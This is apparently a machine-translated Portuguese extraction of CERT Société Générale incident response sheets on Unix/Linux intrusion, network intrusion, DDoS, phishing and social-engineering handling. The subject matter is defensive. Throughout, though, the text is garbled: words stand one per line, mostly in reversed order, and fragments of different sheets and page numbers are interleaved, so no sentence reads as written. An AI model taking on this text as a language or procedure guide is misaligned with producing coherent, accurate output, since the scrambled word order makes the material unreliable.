sistema
do
log
de
arquivos
os
Examine usado.
ser
pode
packages
check-
chamado
script
um
Linux,
alguns
Em
+L1
lsof
#
tenham
que
arquivos
para
ou
de
execução
em
processos
Procure
ÿ
desvinculado:
foi
Entradas

vn
pkg_chk
#
Solaris:
a
–
debsums
Debian:
-vnx
pkg_delete
maneira):
uma
mas
isso,
exatamente
(não
Openbsd
Noc

90
104
 4
3

Remediação
Incidentes
a
Resposta
de
Metodologia

Contenção
necessário.
investigada
será
que
sistema,
do
(RAM)
memória
faça
Também
externo.
suporte
um
em
rígido
disco
o
todo
bit
by-
bit-
física
cópia
uma
usando
possível
se
comprometida,
máquina
da
importantes
dados
os
todos
de
backup
Faça
ÿ fraudulentos.
arquivos
remova
e
incidente
no
envolvidas
contas
às
acessos
os
todos
temporariamente
Remova

desligue.
computador
que
até
segundos
alguns
por
“off”
botão
o
apertar
basta
bateria,
com
laptop
um
energia.
de
plugue
seu
removendo
difícil,
mais
maneira
da
desligue-
desconectada,
ser
puder
e
empresa
para
crítica
considerada
for
não
máquina
a
Se
Machine Translated by Google

#3
IRM

5 suspeito
sistema
um
em
vivo
ao
Análise
comprometido.
esteja
sistema
o
que
suspeita
houver
ainda
mas
resultado,
nenhum
der
não
identificação
de
etapa
a
se
imediatamente
iniciadas
ser
devem
offline
Investigações

Detecção
é
prática
melhor
a
invadido,
sido
desde
comprometimento,
sobre
ter
pode
você
que
conhecimento
e
sistema
invadido
tenha
hacker
longe
quão
o
importa
Não ___________________________________________________

e
o
SG /
CERT
Autor
1.3
IRM:
do
Versão
Pernet
Cedric

Recuperação

aplicar
sistema
reinstalar
cert.societegenerale.com
http://
Site:
[email protected]
mail:
E-

completamente

Tente
@CertSG
Twitter:

encontrar
ÿ
ameaça.
a
avaliar
para
funcionalidade
sua
menos
pelo
ou
eles
com
feito
foi
que
o
veja
e faça
sistema
do
contas
das
as
todas
ÿAltere
caracteres.
7
menos
pelo
ter
e
números
especiais,
caracteres
minúsculas,
maiúsculas/
letras
com
senhas
usar
devem
eles
segura:
forma
de
isso
fazem
usuários
seus

todos
Encontre
ÿ
no
armazenados
dados
os
todos
de
integridade
a
Verifique
ÿ
ÿ
MD5.
hashes
usando
sistema,
específico.
segurança
problema
investigam
que
incidentes
manipuladores
dedicado
guia
um
é
Incidentes
a
Resposta
de
Metodologia
Esta
Resumo

alterados
sido
ter
podem
que
binários
os
todos
ÿRestaurar
tente
geralmente,
Mais
ÿ
insider.
um
de
computador
nenhum
Se
consideradas.
ser
devem
pistas
as
Todas IRM?
planilhas
usar
deve
Quem
(Exemplo: /
su)
bin/

como
vir
pode
ela
que
de
esqueça
se
nunca
encontrada,
for
intrusão
da
prova Team)CISOs
Response
Emergency
(Computer
CERTs•
delegados
e

do
•
Center
Operation
Security
do
Administradores

sistema.
descobrir
de
tipo
mesmo
o
evitar
para
aplicável,
quando
correções
Aplicar
ÿ
conhecida.
e
corrigida
vulnerabilidade
uma
usado
tenha
invasor
o
caso
intrusão,
o
Se

6
se:
Lembre-

descritos:
devem
temas
seguintes
Os
crise.
gerenciamento
célula
da
atores
os
todos
a
disponibilizado
e
escrito
ser
deve
crise
de
relatório
Um

Relatório
Consequências

ÿinicial
segurança
de
incidentes
com
lidar
para
definidas
são
etapas
6
cronogramas
ÿe
Etapas

certo
deu
que
ÿO
o

errado
deu
que
ÿO

incidente
do
ÿCusto
Preparação: e
Identificação:
o Contenção:

experiência.
essa
capitalizar
definidas
ser
devem
gerenciamento
processos
os
melhorar
para
Ações
Linux
Unix/
intrusão
de
Detecção
o Remediação:

O
a Recuperação:
Resultado:

Capitalizar

público
uso
para
é
documento
Este

91
105
 2 3

o
Contenção

e
Preparação
Identificação

Detectar
Objetivo:

Objetivo:
Objetivo:

contatos,
helpdesk;
usuário/
pelo
Notificação acionada.
ser
deve
crise
gerenciamento
de
específica
célula
uma
sensíveis),
recursos
(acesso
estratégica
considerada
for
questão
a
Se

Estabelecer
recursos

Fontes
IDS;
Alerta
Machine Translated by Google

atualizadas;
estejam
monitoramento
de
ferramentas
as
que
Garantir rede;
da
equipe
pela
Detecção

Sistemas
monitoradas:
e
executadas
ser
podem
etapas
seguintes
as
impactados,
recursos
dos
criticidade
da
Dependendo
segurança;
e
rede
operação
de
equipes
suas
com
contatos
Estabeleça externa.
fonte
uma
de
Reclamar

rede.
da
comprometida
área
a
Desconecte
valiosos.
dados
coletar
afetada
LAN
uma
porta
espelhamento
ou
hub
malicioso.
tráfego
despejar
posterior.
análise
incidentes
a
resposta
equipe
sua
para
tcpdump…)
windump,
(tshark,
captura
ferramentas
Use
transmitidos
e
arquivo
um
em
armazenados
ser
podem
rede
de
quadros
Os
todos.
por
conhecido
bem
e
definido
seja
alerta
notificação
processo
um
que
de
se
Certifique-

de
aprofundada.
mais
investigação
uma
realizar
para
afetado(s)
computador(es)
o(s)
Desconecte
ataque.
do
fonte
a
Isole

rede
Registre
suspeita
atividade
negócios.
linha
gerentes
os
com
acordo
em
negócios
crítico
tráfego
o
para
aceitáveis
mitigação
de
medidas
Encontre

Rede
e
A
atualizado;
e
disponível
esteja
rede
à
acesso
pontos
dos
inventário
um
que
de
se
Certifique-

perícia
forense
afetadas.
máquinas
em
indesejados
processos
ou
conexões
Encerre
atualizados;
configurações
e
mapas
tenham
rede
equipes
as
que
de
se
Certifique-
ataque.
o
bloquear
para
IPS
firewall/
de
regras
Use

o
IDS;
seu
pelo
gerados
alertas
Analisar
os;
feche-
e
…)
Modem,
Wifi,
(xDSL,
indesejados
rede
acesso
de
pontos
potenciais
por
regularmente
Procure eventos.
novos
sobre
técnica
equipe
informar
e
malicioso
comportamento
esse
a
corresponder
para
IDS
do
regras
Use

Analisar
rede;
dispositivos
de
registros
e
estatísticas
Revise

e
malicioso
tráfego
do
objetivo
o
entender
Tente estratégicos:
problemas
de
caso
em
hoc
ad
ações
Aplicar

e
tráfego
gestão
de
ferramentas
as
que
Garantir ela;
por
afetados
infraestrutura
da
componentes
os
identificar
verbose
em
registro
recursos
Configurar
o
sobre
alvos
empresariais
usuários
Notificar
roubo;
de
prova
como
usados
ser
podem
que
d'água
marca
com
falsos
documentos
Criar
roubados
perdidos/
tipo
Selecionar
rejeitar
para
estratégicos
arquivos
servidores
Restringir
remoto
ou
exfiltração
destino
Bloquear
-

operacionais.
estão
processos
os tráfego:
do
técnicas
características
as
Identificar
logadas
remotas
Contas seguro.
remoto
servidor
um
los
armazená-
destino
ambiente
no
modo
proibido;
é
feito
ser
deve
que
confidenciais;
arquivos
a
acesso
o
restringir
e
comprometido;
computador
do
conexões
Internet;
de
filtros
em
localização

-
…

-
alvo
serviços
Máquinas/
usados
Protocolos

Tráfego
negócios.
para
críticos
base;
de
fluxos
os
e
tráfego
o
Identifique

e
as
No
final
desta
etapa,
máquinas
Se
um

92
106
 Incidentes
a
Resposta
de
Metodologia
4 5

Remediação
o
Recuperação

Objetivo:
volta
esteja
rede
tráfego
o
que
de
se

Restaurar

Objetivo:
#5
IRM

1.

a
Machine Translated by Google

normal
usados
comunicação
de
canais
descubra
contenção,
rede.
sua
da
limites
os
todos
em
invasor
o
bloqueie
e
identifique
anteriores,
etapas
das
análise
a
Usando

o comportamento.
Bloquear
local
sua
Internet
à
área
a
se
juntas,
subáreas
Reconectar
usado
foi
que
rede
tráfego
o
novamente
Permitir
necessário
invasor
pelo
propagação
de
método
um
como

4.
5.
3.
2.
suspeita
rede
de
atividade
uma
com
lidar
para
Diretrizes
___________________________________________________
SG /
CERT-
Autor:
Lacome
Ferran-
Vincent
&
Bizeul
David
jurídica.
equipe
ou
e/
gerência
sua
envolva
e
adequadas
medidas
as
tome
interna,
pessoa
uma
como
identificada
sido
tiver
fonte
a
Se 1.3
IRM:
do
Versão Comportamento

[email protected]
mail:
E-
necessário Site:
cert.societegenerale.com
http://
necessário.
se
pública,
segurança
serviços
e
abuso
de
equipes
envolver
considere
externo,
infrator
um
como
identificada
sido
tiver
fonte
a
Se @CertSG
Twitter:
a
passo
realizadas
serão
etapas
essas
Todas
técnico.
acompanhamento
com
e
ágil
forma

exemplo.
incidentes,
a
resposta
equipe
sua
como
estrutura,
outra
por
validado
ser
pode
esse
necessário,
Se
remediação.
de
processo
um
Defina
específico.
segurança
problema
investigar
por
responsáveis
dedicado
referência
guia
um
é
Incidentes
a
Resposta
de
Metodologia
Esta
Resumo

IRM?
planilhas
usar
deve
Quem

Remediação
Computadores)
Emergências
a
Resposta
de
(Equipe
CERTs delegados
e
•CISOs
Administradores
Segurança
Operações
de
Centro
úteis.
ser
podem
também
intrusão
IRM
do
correção
de
Etapas
6

SG.
do
equipe
a
toda
com
compartilhado
ser
pode
IRM
O

e
Consequências

e
serviço.
nenhum
danificar
sem
corretamente
funciona
ele
que
se
certifique-
e
correção
de
processo
o
Teste
o

Testar
Se
se:

Objetivo:
dados
Lembre-

coletados
empresa.
e
TI
pela
aprovados
forem
testes
os
que
depois
correção
de
processo
o
Aplique

descritos:
ser
devem
temas
seguintes
Os
- participantes.
os
todos
a
disponibilizado
e
escrito
ser
deve
relatório
Um
problema
do
inicial
Causa segurança
de
incidentes
com
lidar
para
definidas
são
etapas
6
Etapas

cronogramas
-e
o

certo
-deu Relatório
errado
-deu
incidente
-do
Preparação: e
Identificação:

experiência.
essa
capitalizar
e
rede
na
intrusão
a
melhorar
para
ações
o Contenção:
o Remediação:

O
a Recuperação:
Resultado:

capitalizar

para
definidos
ser
devem
gerenciamento
de
processos
Os

público
uso
para
é
documento
Este

93
107
 2 3

e
o

Preparação

definir
Mitigar
Contenção

Objetivo:

Identificação

Objetivo:
recurso.
esse
temporariamente
desative
aplicativo,
de
específico
recurso
um
for
gargalo
o
Se
ÿ

Detectar
componentes
ele.
por
afetados
infraestrutura
de

Objetivo:

Estabelecer
e
identifique
e
DDoS
ataque
do
lógico
fluxo
o
ÿEntenda

do
Machine Translated by Google

que
DDoS
mitigação
de
serviços
os
entender
para
ISP
seu
com
contato
em
Entre
ÿ

os

o
suporte
colateral
vítima
uma
ou
ataque
do
alvo
o
é
você
se
ÿEntenda
etc.
especializado,
dispositivo
carga,
balanceador
firewall,
roteador,
um
de
meio
por
rede
“nuvem”
da
possível
próximo
mais
DDoS
tráfego
o
bloquear
ou
limitar
Tente
ÿ
redundante.
Internet
de
conexão
uma
assine
possível,
ÿSe

policiais.
autoridades
e
internet
de
provedor
seu
com
ÿcontatos afetadas.
infraestruturas
outras
aplicativos
firewalls,
roteadores,
servidores,
log
e
carga
de
arquivos
os
ÿRevise
telefone).
exemplo:
(por
banda
fora
comunicação
canal
um
usar
possibilidade
a
tem
você
que
de
se
Certifique-

benigno
diferenciam
o
DDoS
tráfego
do
aspectos
quais
Identificar
ÿ
protocolos
de
Sinalizadores
IP.
TCP/
de
configurações
suas
ajuste
roteadores
e
servidores
em
indesejados
processos
ou
conexões
ÿEncerre
etc.
chave,
parceiros-
críticos,
clientes
seus
incluir
de
esqueça
Não
ataque.
um
durante
tráfego
o
priorizar
se
permitir
deve
você
que
protocolos
e
IP
endereços
dos
permissões
de
lista
uma
Crie
ÿ

no
-

Inventário
-
originais.
IP
endereços
os
visando
Blackhole
DDoS
Tráfego
mecanismo.
outro
DNS
usando
alternativas
redes
ou
sites
para
troque
possível,
ÿSe

-
ativos.
inventário
rede
topologia
diagrama
um
prepare
etc.);
(AS,
roteamento
configurações
circuito,
IDs
e
IP
endereços
negócios,
proprietários
incluindo
TI,
de
infraestrutura
sua
da
detalhes
os
ÿDocumente

tráfego
o
revisar
para
usadas
ser
podem
rede
análise
de
Ferramentas

etc.)
voz,
mail,
e-
web,
servidor
exemplo:
(por
clientes
usuários/
seus
e
você
entre
alternativo
comunicação
de
canal
um
Crie
ÿ

de
gargalo
ou
falha
ponto
único
um
sem
rede
de
infraestrutura
boa
uma
Projete
ÿ malicioso.
e
benigno
tráfego
entre
diferenciar
para
NIDS
assinatura
uma
crie
possível,
Se
ÿ

na
ÿTcpdump,
AS.
diferentes
de
meio
por
etc.)
(SMTP,
críticos
serviços
outros
e
DNS
servidores
seus
ÿDistribua

infraestrutura
e
sumidouro)
exemplo:
(por
roteamento
alterações
DNS
limpeza
produto
ou
serviço
um
de
meio
por
tráfego
o
direcione
possível,
ÿSe
ataque.
no
delas
visibilidade
a
sobre
mais
saber
para
internas
equipes
suas
com
contato
em
Entre
ÿ
DDoS.
alvos
ser
podem
que
aplicativos
e
operacional
sistema
rede,
componentes
de
configuração
a
ÿReforce

atores
internos
Envolva
controlar:
de
gostaria
você
que
tráfego
o
sobre
específico
Seja
ajuda.
pedir
para
ISP
seu
com
contato
em
ÿEntre
Protocolos
precisão.
e
rapidez
mais
com
ataque
o
identificar
possa
você
que
para
atual
infraestrutura
sua
da
desempenho
base
de
linha
uma
Estabeleça
ÿ

rede.
à
desnecessários
pacotes
adicionar
evitar
backsquatter),
exemplo:
(por
DDoS
ao
resposta
em
enviar
podem
sistemas
seus
que
tráfego
o
bloquear
para
saída
de
filtros
Configure
ÿ
origem
IP
Endereços
envolvidos
rede
de
Blocos

-
DDoS.
de
mitigação
em
especializados
serviços
ou
produtos
adquirir
considere
Internet,
da
depende
negócio
seu
o
ÿSe

TTL.
valor
bom
um
é
600
forem
originais
IP
endereços
redirecionamento
o
facilitar
necessário,
se
TTLs,
Reduza
atacados.
ser
podem
que
sistemas
os
para
DNS
do
(TTL)
vida
tempo
de
configurações
as
Confirme
ÿ empresa.
sua
da
jurídica
e
executiva
equipes
as
ÿ
gerência.
da
aprovação
obter
para
mais
precisa
você
que
explique
exemplo,
Por
fraudador.
o
com
tempo
ganhar
tente
extorsão,
tentativa
de
caso
Em
ÿ

demanda
ataque.
do
precursora
como
fundo
de
problemas.
de
caso
em
ativar
possa
você
que
backup
um
configurar
considere
serviços,
seus
dos
criticidade
da
ÿDependendo extorsão.
uma
recebeu
empresa
a
se
Descubra
ÿ

a
o

e
sistemas
firewall,
IDS,
de
equipes
suas
para
contatos
Estabeleça ameaçar
em
interesse
teria
alguém
se
ÿPesquise
do
Se

Verifique

de
empresa
sua
ÿ
estiver
gargalo

DDoS.
ataque
cenários
prováveis
dinheiro)
perda
exemplo,
(por
comerciais
implicações
entender
para
negócios
de
linhas
as
com
Colaborar
ÿ
--

DDoS.
incidentes
em
DR
BCP/
planejamento
de
equipe
sua
Envolva
ÿ

o
A

fase

94
108
 4 6
Incidentes
a
Resposta
de
Metodologia

a
Remediação
os
Consequências

Tomar
Objetivo:
Objetivo:
considere
possíveis:
das
algumas
estão
aqui
informações,
obter
Para
remediação.
medidas
identificados,
foram
DDoS
patrocinadores
os
Se
aplica
ele
que
de
se
certifique-
e
ISP
seu
com
contato
em
Entre
ÿ
Routing
Blackhole

e
Machine Translated by Google

#4
IRM

ÿas
da
comunicações
durante
tomadas
decisões
e
pessoas
envolvendo
resposta,
DDoS.
processo
seu
do
eficácia
a
Avalie
afetaram
que
suposições
as
ajuste
necessário,
Se
eficaz.
ou
rápida
mais
forma
incidente
ao
responder
para
tomado
ter
poderia
você
preparação
de
etapas
quais
Considere
ÿ

Documentar

sua
equipes
jurídicas
empresa.
a

executivas
distribuída
serviço
negação
de
incidentes
com
lidar
para
Diretrizes
pipe
Clean-
Sinkhole/
scrubbing/
Traffic- ___________________________________________________

-
SG /
CERT
Autor
1.3
IRM:
do
Versão
Lacome
Ferran-
Vincent
Resposta

2)
ou
Tier1
nível
no
possível
(se
Filtragem lei envolvendo
execução.

-
cert.societegenerale.com
http://
Site:
[email protected]
mail:
E-

@CertSG
Twitter:

futuros
com
lo
ajudá-
podem
organizações
suas
incidentes.
dos
fora
e
dentro
relacionamentos
quais
ÿConsidere

de
Ações
andamento.
em
estiver
legal
ação
uma
se
jurídicas
equipes
as
com
ÿColaborar específico.
segurança
problema
investigar
por
responsáveis
dedicado
referência
guia
um
é
Incidentes
a
Resposta
de
Metodologia
Esta
Resumo

IRM?
planilhas
usar
deve
Quem
• Administradores

5 •CISOs
Computadores)
Emergências
a
Resposta
de
(Equipe
•CERTs
delegados
e •
Segurança
Operações
de
Centro

Recuperação
o
Se
se:
Lembre-

o
Retornar
Objetivo:
novamente.
acessíveis
estejam
afetados
serviços
os
que
de
se
Certifique-
ÿ

Avalie
básico.
ao
volta
esteja
infraestrutura
sua
da
desempenho
o
que
de
se
Certifique-
ÿ

segurança
de
incidentes
com
lidar
para
definidas
são
etapas
6
Etapas

ÿ
o
se
lidar
para

original.
rede
sua
para
tráfego
o
Retorne
ÿ
prepare-

Reverter
interrompidos.
serviços
os
ÿReinicie
Preparação:

Garanta
público
uso
para
é
documento
Este

95
serviços
que Mencionar
109
 1 1 3

a
Contenção

Preparação

Preparação
line.
on-
bancárias
informações
credenciais/
solicitará
nunca
empresa
que
afirmando
assinatura
uma
usar
clientes
para
(URL)
links
envio
o
evitar
práticas,
boas
aplicar
Portanto,
prioridade.
como
segurança
a
considerar
e
phishing
problemas
dos
cientes
estar
devem
negócios
de
linhas
em
Pessoas

Aumentar
Mitigar

Objetivo:
Objetivo:
esquecido.
legítimo
site
em
remoção
procedimento
um
inicie
você
que
evitará
e
situação
analisar
a
ajudará
Isso
empresa.
sua
à
pertencentes
legítimos
domínios
os
todos
de
lista
uma
Crie

Estabelecer
phishing.
site
um
de
caso
no
ataque
do
URL
a
Espalhe

etc.
Explorer,
Internet
do
opções
as
use
web:
da
navegadores
Initiative,
Phishing-
Netcraft,
ferramentas
de
barra
Firefox,
Safari,
Chrome,
no
fraudulenta
URL
a
espalhar
para
possíveis
meios
os
todos
Use
Machine Translated by Google

também.
claro
implantação
procedimento
teste
e
andamento.
phishing
de
ataque
um
sobre
clientes
seus
avisar
momento,
qualquer
a
publicada
ser
para
pronta
infraestrutura,
sua
em
hospedada
web
da
página
uma
Prepare

correção.
de
fase
na
trabalha
você
enquanto
site
o
acessem
usuários
os
que
impedirá
Isso

2
processo
o
durante
etc.
hospedagem
empresa
a
com
contato
entrar
tentar
ao
coisas
as
agilizará
Isso
idiomas.
vários
em
possível
se
phishing,
casos
todos
para
usará
os
Você
remoção.
mail
e-
de
formulários
Prepare spam.
denúncia
de
parceiros
sites/
em
mail
e-
do
fraudulento
conteúdo
o
Espalhe

Identificação

o
clientes.
seus
com
se
Comunique-

Detectar
Objetivo:
atual.
phishing
ataque
o
sobre
informações
com
aviso
alerta/
de
página
a
Implante

de
empresa.
na
domínio
nomes
registro
no
envolvidas
pessoas
as
todas
de
lista
uma
Mantenha web,
da
formulários
mail,
(e-
perto
contato
de
pontos
seus
os
todos
Monitore
conscientização.
a
aumentar
para
informativa
muito
phishing
página
sim
mas
aviso,
alerta/
de
mensagem
uma
sempre
envie
não
semana,
por
vezes
várias
afetado
seja
você
Caso

Contatos
detecção
decisões.
pode
você
que
mencionando
contrato
um
tenha
possível,
Se
phishing.
a
relacionadas
ações
eventuais
e
cibernéticos
crimes
sobre
decisões
tomar
para
credenciadas
pessoas
as
todas
de
lista
uma
Mantenha terceiros.
parceiros/
coletar
tente
e
spam
de
armadilhas
Implante

exemplo.
por
PhishTank,
ou
AA419
como
phishing,
repositórios
de
ativo
monitoramento
Implante phishing.
de
site
do
fonte
código-
o
Verifique

-
fraudador.
o
mail
e-
por
enviados
ou
PHP)
script
um
(geralmente
acessar
consegue
não
você
que
web
da
conteúdo
outro
exportados:
são
dados
os
onde
para
Veja

possível):
se
semana,
dias
7
dia,
por
horas
(24
hábil
tempo
em
contatado
ser
de
maneiras
várias
Tenha phishing
relatando
estar
possa
que
Twitter,
RSS/
feed
ou
acesso,
tenha
você
qual
à
especializada
discussão
de
lista
qualquer
Monitore

Contatos
casos.
(ex:
todos
para
lembrar
fácil
mail,
e-
-de gráficos
os
Faça
construída.
é
phishing
de
página
a
-como
segurança@suaempresa) instantânea.
reação
alarme
um
acione
detecção
cada
que
para
fontes,
essas
todas
em
automatizados
monitoramento
de
sistemas
Utilize localmente?
armazenados
são
ou
legítimos
sites
seus
dos
um
de
vêm

do
(localização
empresa
sua
da
site
no
-web
enganado.
foi
ele
que
depois
legítimo
site
usuário
trazem
phishing
de
sites
os
quando
caso
o
frequentemente
é
Esse
site.
seu
para
pessoas
trazendo
suspeito
referenciador
nenhum
há
não
se
Verifique
logs.
web
seus
Monitore fraudador.
do
página
na
PHISHING”
DE
“SITE
logotipo
o
exibir
para
los
alterá-
pode
você
sites,
próprios
seus
dos
um
de
retirados
sejam
gráficos
os
caso
possível,
Se
distância
de
cliques
2
que
do
mais
não
importante,
é
principal)
página

Twitter
-no

em:
remoção
contatos
de
lista
uma
manter
e
Estabelecer

-
hospedagem
de
Empresas

as
-

partes
registro
de
Empresas

Envolva
-
mail
e-
de
Provedores fraudulento
mail
e-
endereço
site/
no
agir
de
decisão
A
minutos.
poucos
em
possível,
rápido
mais
o
tomada
ser
deve
necessário.
se
ajudar,
poderão
sempre
provavelmente
Eles
todo.
mundo
no
CERTs
em
contatos
mantenha
e
Estabeleça

a
telefone.
ou
mail
e-
bancárias
informações
credenciais/
pedirá
nunca
você
saibam
clientes
certifique-
e
é
que
o
explique
phishing,
fraudes
sobre
conscientização
a
Aumente
clientes.
seus
com
comunicar
se
para
phishing
de
incidentes
por
espere
Não
Reúna

páginas.
tela
capturas
tire
necessário,
Se
várias.
houver
primeira,
a
apenas
não
phishing,
esquema
do
as
todas
pegar
esqueça
se
Não
exemplo.
por
HTTrack,
o
como
isso,
fazer
para
eficiente
ferramenta
Use
phishing.
web
da
páginas
das
hora
e
data
de
carimbo
com
cópia
uma
Faça

Aumentar

96
110
 4 5
Incidentes
a
Resposta
de
Metodologia

Remediação

a
Recuperação
vulnerabilidade.
mesma
usando
voltar
possa
não
fraudador
proprietário,
ao
fraude
claramente
Explique
site.
que
nele,
segurança
a
atualizar
tudo,
acima
e,
fraudulento
conteúdo
remover
adequadas:
medidas
tomar
para
do
proprietário
o
com
contato
entrar
tente
comprometido,
site
um
em
hospedadas
estejam
fraudulentas
phishing
de
páginas
as
Caso

Retornar

Objetivo:
Objetivo:
do
Machine Translated by Google

fim
sejam
mail
e-
endereços
ou
e/
fraudulentas
páginas
as
que
de
se
Certifique- #13
IRM

o
Avalie
perto.
bem
o
monitore-
retirado,
não
e
usado
seja
redirecionamento
Caso
depois.
horas
algumas
reaparecer
pode
phishing
de
site
um
vezes,
Às
fraudulenta.
URL
a
monitorando
Continue

a
phishing
de
incidentes
com
lidar
para
Diretrizes
___________________________________________________
Resposta
SG /
CERT
Autor
1.0
IRM:
do
Versão
PERNET
Cedric
do
endereços
os
mails
e-
Envie
site.
coisas.
as
agilizar
para
telefone
por
alguém
falar
tente
e
empresa
a
com
também
contato
em
entre
caso,
qualquer
Em é um
abuse@hostingcompany)
(geralmente
da
hospedagem
de site.
seu
do
associada
aviso
página
a
remova
phishing,
campanha
uma
de
final
Ao

cert.societegenerale.com
http://
Site:
[email protected]
mail:
E-
roubadas
credenciais
recebem
que
fraudulentas
contas
destino).
endereço
o
obter
conseguiu
você
se
comum,
ou
mail”
“somente
phishing
caso
um
(em
crédito
cartão
do
informações
as
desativar
para
mail
e-
hospedagem
de
empresa
a
com
contato
em
Entre
@CertSG
Twitter:

serviço.
pelo
responsável
empresa
com
contato
em
entrando
o
também
remova
redirecionamento),
de
URL
uma
a
leva
geralmente
mail
e-
no
contido
link
(o
redirecionamento
um
haja
Caso

específico.
segurança
problema
investigar
por
responsáveis
dedicado
referência
guia
um
é
Incidentes
a
Resposta
de
Metodologia
Esta
Resumo

6 IRM?
planilhas
usar
deve
Quem
exemplo.
por
horas,
duas
cada
a
regularmente,
mails
e-
enviar
e
volta
de
ligar
em
hesite
tomada,
seja
ação
nenhuma
ou
resposta
obtenha
não
você
Caso
• Administradores
•
Computadores)
Emergências
a
Resposta
de
(Equipe
•CERTs
delegados
e
CISOs •
Segurança
Operações
de
Centro

os
Consequências
fraude.
eliminar
ajudar
pode
que
o
envolvido,
país
no
local
CERT
um
com
contato
em
entre
lenta,
muito
for
remoção
a
Se

Objetivo:
Documentar
o
Se
se:

eficiente.
e
rápida
mais
forma
incidente
ao
responder
para
tomado
ter
poderia
você
preparação
de
medidas
quais
em
Pense
Lembre-

envolvida.
parte
cada
com
contato
em
entrar
eficaz
mais
maneira
a
é
qual
sobre
notas
adicione
e
contatos
de
listas
suas
Atualize

futuros.
incidentes
com
lo
ajudá-
podem
organização
sua
da
fora
e
dentro
relacionamentos
quais
Considere

segurança
de
incidentes
com
lidar
para
definidas
são
etapas
6
legal.
ação
uma
necessária
seja
caso
jurídicas
equipes
as
com
Colabore
Etapas

o
Preparação: e
Identificação:
o Contenção:
o Remediação:

O
a Recuperação:
Resultado:

público
uso
para
é
documento
Este

97
111
 3
2

Parte

Parte
Contenção

e
Preparação
o
Identificação

reunir
definir
Mitigar

contatos,

objetivos:
Objetivo:

Detectar
Objetivo:

estabelecer

procedimentos
segurança
de
políticas
as
e
usuários
dos
conscientização
a
ÿAumentar

Nesta
ÿ
detalhadas.
informações
pedindo
serviço,
seu
você/

etapa,

Ligação
Machine Translated by Google

TI.
sistemas
organização
clientes,
sobre
cargos,
social,
previdência
número
endereço,
fixo),
(celular
telefone
números
mail,
e-
endereço
nome,
conta,
informações
senhas,
usuário,
de
IDs
incluir
pode
Isso
identificada.
não
pessoa
uma
a
corporativa
ou
pessoal
informação
nenhuma
forneça
Nunca 3.
parte
a
vá
solicitações
as
negue
concorrente,
um
para
valiosas
ser
podem
que
informações
solicitar
e
empresa
da
fora
trabalhar
contato
o
Se

Ações
ÿ

3.
parte
a
vá
opção,
essa
rejeitar
ele
verificar.
concordar,
invasor
suposto
diretório.
no
declarado
para
volta
ligue
você
que
proponha
interno,
é
não
ou
oculto
está
telefone
de
número
mas
empresa,
sua
da
funcionário
um
ser
finge
contato
o
Se

houver.
se
CSIRT,
CERT/
seu
do
vermelha”
telefônica
“linha
a
Use
usuários.
clientes/
de
dados
ou
corporativos
segredos
humanos,
recursos
roubar
é
social
engenheiro
do
objetivo
O
inventado.
nome
um
com
número
o
ele
a
Dê

etapas:
estas
siga
telefone,
fornecer
você
pedir
invasor
Se
escolhido.
telefone
de
número
e
aconteceu
que
o
explicando
inventado,
nome
um
com
CSIRT
CERT/
equipe
sua
para
imediatamente
Ligue
caso.
nenhum
em
informações
divulgue
Não
empatia...).
curiosidade,
(medo,
falar
a
vítima
sua
incitar
para
técnicas
várias
usar
pode
agressor
O

Relate
evento
qualquer
responder.
mail
e-
endereço
ou
ligação
a
retornar
para
telefone
de
número
um
peça
final,
no
e,
pedidos
seus
atentamente
Ouça pontos:
estes
encontro.
um
fingindo
tarde,
mais
volta
ligar
para
siga
alguém,
com
falar
quiser
ele.
a
pergunte
vermelho,
telefone
do
número
encontrar
de
tempo
der
não
e
muito
estressar
te
agressor
o
Se

humanas.
fraquezas
as
usar
tenta
ele
de
se
lembre-
ameaçando,
ou
gritando
esteja
agressor
o
que
mesmo
calma,
a
mantenha
e
nota
Tome
necessário.
se
“vermelho”,
telefone
um
solicite
Social”.
“Engenharia
como
marcado
claramente
ser
deve
vermelho
telefone
de
número
O

O
de
deve
fundo
de
ruídos
-
preciosas:
serão
informações
seguintes
as
longe,
mais
ir
puder
você
Se
ligue
e
espera
em
agressor
o
Coloque

número
telefone
aconteceu
que
o
explique
e
CSIRT
CERT/
Equipe
-
solicitadas /
informações
correspondente,
nome
o
chamada
da
duração
hora
organizacional,
conhecimento
e
setor
do
idioma
linguísticas,
habilidades
pessoas,
das
sotaque
-
para
atacante
do
conversa
a
Transfira
“estranho”
qualquer
redirecionar
definido
processo
um
ÿTenha
evidências.
coleta
de
fins
para
gravada
sempre
ser
deve
vermelha
telefônica
linha
A -
- ele)
a
número
o
dê
(não
CSIRT
CERT/
Equipe

sociais
redes
conversas
com
lidar
se
ÿPrepare-
objetivos.
seus
e
invasor
o
rastrear
a
ajudar
podem
informações
quais
identificar
para
engenheiros
detalhadas
informações
solicita
conhece
não
você
que
ÿ
E-

ÿ
informações.

mail /
E-
invasor.
o
rastrear
a
ajudar
Pode
investigação.
fins
anexados)
documentos
como
(envie
cabeçalhos
incluindo
mails,
e-
os
todos
segurança
de
equipe
sua
para
Encaminhe
ações
quais
jurídico
departamento
seu
com
Verifique 3.
parte
a
vá
concorrente,
para
valiosas
ser
podem
que
informações
solicitar
e
empresa”
da
“fora
mail
e-
de
endereço
um
tiver
contato
o
Se

ÿ
lidar.
podem
elas
reações
quais
e
permitidas
são

contexto.
dependendo
objetivos,
os
entender
podem
Eles
social.
engenharia
ataque
relacionado
encontrado
foi
incidente
cópia.
uma
como
colocará
você
que
dele,
gerente
do
nome
obter
para
empresa
da
diretório
use
e
explicações
algumas
ele
a
peça
estranhas,
informações
pedindo
está
mas
interno,
mail
e-
de
endereço
um
usa
contato
o
Se

los
informá-
para
gerência
alta
a
notificar
ÿEventualmente

98
112
 3 5

Incidentes
a
Resposta
de
Metodologia

a
Contenção
o
Recuperação

Ações
ÿ

Objetivo:
Restaurar
social.
engenharia
de
caso
no
tomadas
decisões
e
ações
as
sobre
gerência
alta
a
Notifique
#10
IRM
Machine Translated by Google

técnicas:
destas
uma
use
Retome
continuar.
se
problema
lidará
advogados
equipe
sanções
com
punido
lei,
por
proibido
erros.
cometer
incite
durar
conversa
faça
e
ritmo
Diminua
falar.
disposto
está
invasor
é
social
engenharia
de
ataque
o
ele
Explique
que
pessoas
das
identidade
a
Personificar

mail)
e-
ou
(telefone
social
engenharia
de
incidente
um
com
lidar
Como

Incidente
___________________________________________________
1.0
Versão
SG
CERT
Equipe
IRM:
do
Autor

cert.societegenerale.com
http://
Site:
[email protected]
mail:
E-

diretório.
no
exiba-
e
outro
crie
lo”,
“queimá-
para
se
prepare-
usado,
foi
armadilha
da
telefone
de
número
o
Se 6
@CertSG
Twitter:

os
